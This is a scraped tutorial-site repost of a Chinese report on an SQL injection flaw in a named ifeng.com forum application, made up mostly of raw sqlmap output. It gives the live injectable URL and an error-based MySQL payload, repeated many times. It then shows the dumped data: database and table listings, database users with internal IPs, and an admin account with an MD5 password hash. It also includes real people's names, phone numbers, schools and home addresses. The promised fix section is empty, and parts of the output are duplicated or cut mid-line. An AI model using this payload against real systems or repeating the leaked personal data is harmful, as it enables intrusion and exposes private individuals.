凤凰网分站SQL注入漏洞_MySQL-Mysql Tutorial-php.cn

Table of Contents

修复方案：

Home

Database

Mysql Tutorial

凤凰网分站SQL注入漏洞_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 01:08 PM

凤凰网分站SQL注入漏洞注入地址：http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined

单引号回车后报错，爆路径，于是丢到sqlmap中跑

之后就什么都有了

首先是数据库列表

之后查看是否是dba之后查看用户列表

完完全全的暴露了内网的ip和其他数据库地址

剩下的看代码吧

<code>sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>database management system users [234]:<br>[*] ''@'localhost'<br>[*] 'B74wNuTbbx'@'10.11.2.89'<br>[*] 'B74wNuTbbx'@'10.11.2.90'<br>[*] 'B74wNuTbbx'@'10.13.2.134'<br>[*] 'B74wNuTbbx'@'10.13.2.135'<br>[*] 'B74wNuTbbx'@'10.13.2.176'<br>[*] 'B74wNuTbbx'@'10.13.2.177'<br>[*] 'B74wNuTbbx'@'220.181.67.192'<br>[*] 'iadmin'@'211.151.61.77'<br>[*] 'root'@'10.13.2.132'<br>[*] 'root'@'10.13.2.134'<br>[*] 'root'@'10.13.2.135'<br>[*] 'root'@'10.13.2.176'<br>[*] 'root'@'10.13.2.177'<br>[*] 'root'@'127.0.0.1'<br>[*] 'root'@'192.168.2.162'<br>[*] 'root'@'192.168.2.167'<br>[*] 'root'@'220.181.24.100'<br>[*] 'root'@'220.181.24.166'<br>[*] 'root'@'220.181.24.2'<br>[*] 'root'@'220.181.67.192'<br>[*] 'root'@'localhost'<br>[*] 'zabbix'@'127.0.0.1'<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>[32 tables]<br>+-----------------------+<br>| wiki_activation	 |<br>| wiki_advertisement	|<br>| wiki_attachment	 |<br>| wiki_autosave		 |<br>| wiki_banned		 |<br>| wiki_blacklist		|<br>| wiki_category		 |<br>| wiki_channel		|<br>| wiki_comment		|<br>| wiki_creditdetail	 |<br>| wiki_doc			|<br>| wiki_docreference	 |<br>| wiki_edition		|<br>| wiki_focus			|<br>| wiki_friendlink	 |<br>| wiki_language		 |<br>| wiki_lock			 |<br>| wiki_plugin		 |<br>| wiki_pluginhook	 |<br>| wiki_pluginvar		|<br>| wiki_pms			|<br>| wiki_regular		|<br>| wiki_regular_relation |<br>| wiki_regulargroup	 |<br>| wiki_session		|<br>| wiki_setting		|<br>| wiki_style			|<br>| wiki_synonym		|<br>| wiki_task			 |<br>| wiki_user			 |<br>| wiki_usergroup		|<br>| wiki_word			 |<br>+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[22 columns]<br>+------------+-----------------------+<br>| Column	 | Type				|<br>+------------+-----------------------+<br>| birthday | int(10) unsigned	|<br>| checkup	| int(10) unsigned	|<br>| creates	| mediumint(8) unsigned |<br>| credits	| int(10)			 |<br>| edits	| mediumint(8) unsigned |<br>| email	| char(50)			|<br>| gender	 | tinyint(1)			|<br>| groupid	| smallint(6) unsigned|<br>| image	| varchar(255)		|<br>| language | varchar(20)		 |<br>| lastip	 | char(15)			|<br>| lasttime | int(10) unsigned	|<br>| location | varchar(30)		 |<br>| password | char(32)			|<br>| regip	| char(15)			|<br>| regtime	| int(10) unsigned	|<br>| signature| text				|<br>| style	| varchar(20)		 |<br>| timeoffset | varchar(20)		 |<br>| uid		| mediumint(8) unsigned |<br>| username | char(15)			|<br>| views	| int(10) unsigned	|<br>+------------+-----------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[10 entries]<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email		 | gender | lastip		 | checkup | regtime	| credits | creates | lasttime | location | username		| birthday | password						 | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br>| 1 | 4	 | <blank> | default | 0	 | 59	| <blank> | wuwei@ifeng.com | 0	| 220.181.24.2 | 1	 | 1270174931 | 21	| 0	 | 1270174967 | <blank>| house_admin	 | 0		| e10adc3949ba59abbe56e057f20f883e | zh	 | <blank> | 8		|<br>| 2 | 4	 | <blank> | default | 2	 | 171 | <blank> | <blank>		 | 0	| 220.181.67.192 | 1	 | 0		| 41	| 1	 | 1286971633 | <blank>| 冠缨豺郎			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 3 | 2	 | <blank> | default | 0	 | 29	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| zhaoxiaoxiong | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 4 | 4	 | <blank> | default | 44	| 825 | <blank> | <blank>		 | 0	| 220.181.67.192 | 1	 | 0		| 264	 | 23	| 1287390647 | <blank>| 漫巴			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 5 | 8	 | <blank> | default | 7	 | 1140| <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 663	 | 124	 | 1270429517 | <blank>| 西瓜妹			 | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 6 | 2	 | <blank> | default | 0	 | 29	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| zhuantou		| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 7 | 2	 | <blank> | default | 0	 | 30	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| c100			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 8 | 8	 | <blank> | default | 7	 | 1183| <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 794	 | 150	 | 1270959387 | <blank>| 金鱼77			| 0		| <blank>						| zh	 | <blank> | 8		|<br>| 9 | 2	 | <blank> | default | 0	 | 31	| <blank> | <blank>		 | 0	| <blank>		| 1	 | 0		| 20	| 0	 | 0		| <blank>| qq15236958@sina | 0		| <blank>						| zh	 | <blank> | 8		|<br>| 10| 7	 | <blank> | default | 0	 | 793 | <blank> | <blank>		 | 0	| 220.181.24.2 | 1	 | 0		| 533	 | 102	 | 1270545218 | <blank>| qq15236958	| 0		| <blank>						| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_house<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip| checkup | regtime | credits | creates | lasttime | location | username	 | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br>| 100 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| yangganghong | 0		| <blank>| zh	 | <blank> | 8		|<br>| 101 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 肖张氏		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 102 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| hanruikai	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 103 | 2	 | <blank> | default | 0	 | 7	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| cbgwllcjt	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 104 | 2	 | <blank> | default | 0	 | 4	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| gk777		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 105 | 2	 | <blank> | default | 0	 | 4	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 品酸		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 106 | 2	 | <blank> | default | 0	 | 3	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| daiyb		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 107 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 欧阳君山		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 108 | 2	 | <blank> | default | 0	 | 3	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 小马不识途		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 109 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| gxy891029	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 110 | 2	 | <blank> | default | 0	 | 6	 | <blank> | <blank> | 0	| <blank> | 1	 | 0	 | 20	| 0	 | 0		| <blank>| 晓飞416329	 | 0		| <blank>| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>[35 tables]<br>+------------------------+<br>| wiki_activation		|<br>| wiki_advertisement	 |<br>| wiki_attachment		|<br>| wiki_autosave		|<br>| wiki_banned			|<br>| wiki_blacklist		 |<br>| wiki_category		|<br>| wiki_category_20100224 |<br>| wiki_channel		 |<br>| wiki_comment		 |<br>| wiki_creditdetail	|<br>| wiki_doc			 |<br>| wiki_doc_20100224_20 |<br>| wiki_doc_temp_copy	 |<br>| wiki_docreference	|<br>| wiki_edition		 |<br>| wiki_focus			 |<br>| wiki_friendlink		|<br>| wiki_language		|<br>| wiki_lock			|<br>| wiki_plugin			|<br>| wiki_pluginhook		|<br>| wiki_pluginvar		 |<br>| wiki_pms			 |<br>| wiki_regular		 |<br>| wiki_regular_relation|<br>| wiki_regulargroup	|<br>| wiki_session		 |<br>| wiki_setting		 |<br>| wiki_style			 |<br>| wiki_synonym		 |<br>| wiki_task			|<br>| wiki_user			|<br>| wiki_usergroup		 |<br>| wiki_word			|<br>+------------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: baike_health<br>Table: wiki_user<br>[11 entries]<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| uid | groupid | image | style | edits | views | regip | email | gender | lastip		 | checkup | regtime | credits | creates | lasttime | location | username	 | birthday | password | language | signature | timeoffset |<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br>| 100 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 新娘jiujiu	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 101 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 江湖一鸣		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 102 | 2	 | <blank> | default | 0	 | 40	| <blank> | <blank> | 0	| 59.175.185.178 | 1	 | 0	 | 21	| 0	 | 1267751010 | <blank>| erxy		 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 103 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| fuf			| 0		| <blank>| zh	 | <blank> | 8		|<br>| 104 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 墨侃			 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 105 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| maiky1987	| 0		| <blank>| zh	 | <blank> | 8		|<br>| 106 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| yantachenzhong | 0		| <blank>| zh	 | <blank> | 8		|<br>| 107 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| chen0928	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 108 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 高老庄0560		| 0		| <blank>| zh	 | <blank> | 8		|<br>| 109 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| 为了国家的80后	 | 0		| <blank>| zh	 | <blank> | 8		|<br>| 110 | 2	 | <blank> | default | 0	 | 0	 | <blank> | <blank> | 0	| <blank>		| 1	 | 0	 | 20	| 0	 | 0		| <blank>| bxbglg123	| 0		| <blank>| zh	 | <blank> | 8		|<br>+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>available databases [11]:<br>[*] app_bbs<br>[*] app_news<br>[*] app_weather<br>[*] apphistory_news<br>[*] appmil_news<br>[*] appsports_news<br>[*] baike_health<br>[*] baike_house<br>[*] information_schema<br>[*] mysql<br>[*] test<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>[1 table]<br>+------+<br>| dkjs |<br>+------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br>---<br><br>Database: app_bbs<br>Table: dkjs<br>[3 entries]<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| id| city	| name | story			 | phone	 | school	 | is_wap | photo3 | verify | photo2 | photo1 | address		 | province | submit_time		 |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br>| 122 | 南阳	| 李果 | 失业，多次评为优秀教师，模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0	| 4	| yes	| 4	| 4	| 河南省邓州市穰东镇前庄村轩寺组 | 河南	 | 2010-02-05 16:08:03 |<br>| 123 | <blank> | 晓清 |				 | 13017329166 | 某学校		| 0	| 4	| yes	| 4	| 4	| 湖南			| 湖南	 | 2010-02-05 16:14:31 |<br>| 124 | 梧州	| 郭伟民|				 | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0	| 4	| yes	| 4	| 4	| 岑溪市城中路20号	 | 广西	 | 2010-02-05 16:14:38 |<br>+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br><br>sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br>---<br>Place: GET<br>Parameter: order_by<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM 